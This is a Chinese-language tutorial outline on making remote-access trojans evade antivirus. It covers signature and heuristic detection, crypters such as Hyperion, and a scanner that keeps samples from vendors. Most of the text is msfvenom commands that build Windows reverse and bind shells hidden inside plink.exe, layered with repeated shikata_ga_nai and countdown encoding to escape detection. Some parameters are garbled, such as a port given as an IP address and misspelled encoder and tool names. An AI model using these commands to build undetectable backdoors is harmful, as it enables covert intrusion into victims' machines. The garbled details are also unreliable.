RAT免杀技术

RAT

RAT思维导图下载链接

检测原理

基于二进制文件中特征签名的黑名单检测方法

基于行为的分析方法（启发式）

免杀技术

修改二进制文件中的特征字符

• 替换、擦除、修改

加密技术（crypter）

• 通过加密使得特征字符不可读，从而逃避AV检测
• 运行时分片分段的解密执行，注入进程或AV不检查的无害文件中

防病毒软件的检测

• 恶意程序本身的特征字符
• 加密器crypter的特征字符

在线多引擎查杀网站与AV厂商共享信息

https://www.virustotal.com/gui/home/upload

http://www.virscan.org/

搞黑的在线多引擎查毒站

https://nodistribute.com/

软件保护

软件开发商为保护版权，采用的混淆和加密技术避免盗版逆向

常被恶意程序软件用于免杀目的

Hyperion（32bit程序加密器）

• Crypter（加密）
• Container（解密器+PE Loader）

利用模板（正常程序）隐藏shell

#msfvenom -p（加载） windows/shell_reverse_tcp -x（使用模板） /usr/share/windows-binaries/plink.exe lhost=1.1.1.1 lport=4.4.4.4 -a（操作系统架构） x86 --platform（平台） win（windows） -f（输出格式） exe -o（输出） a.exe

#msfvenom -p（加载） windows/shell/bind_tcp -x （模板） /usr/share/windows-binaries/plink.exe lhost=1.1.1.1 lport=4444 -e x86/shaikata_ga_nai -i 5 -a x86 --platform win -f exe > b.exe

#strins a.exe（查看可疑程序可读字符串内容）

#md5sum *.exe（查看程序的值）

加密编码反弹shell

#msfvenom -p windows/shell/bind_tcp lhost=1.1.1.1 lport=4444 -f（格式） raw（原始格式） -e（加密） x86/shikata_ga_nai（加密模块） -i（加密次数） 5（五次）

| （管道）msfvenom -a（架构） x86 --platform（平台 ） windows -e（加密） x86/countdown（模块） -i（加密次数） 8（次数） -f（输出格式） raw（原始格式）

|（管道） msfvenom -a（架构） x86 --platform（平台） windows -e（加密） x86/shikata_ga_nai（模块） -i（加密次数） 9 -b（过滤特殊字符） ‘\x00’ -f（输出格式） exe -o（输出） a.exe

生成反弹shell

#msfvenom -p（payload） windows/shell/bind_tcp lhost（对方ip）=1.1.1.1 lport（对方端口）=4444 -a（操作系统架构） x86 --platform（平台） win（windows平台） -f （输出格式）exe -o（输出） a.exe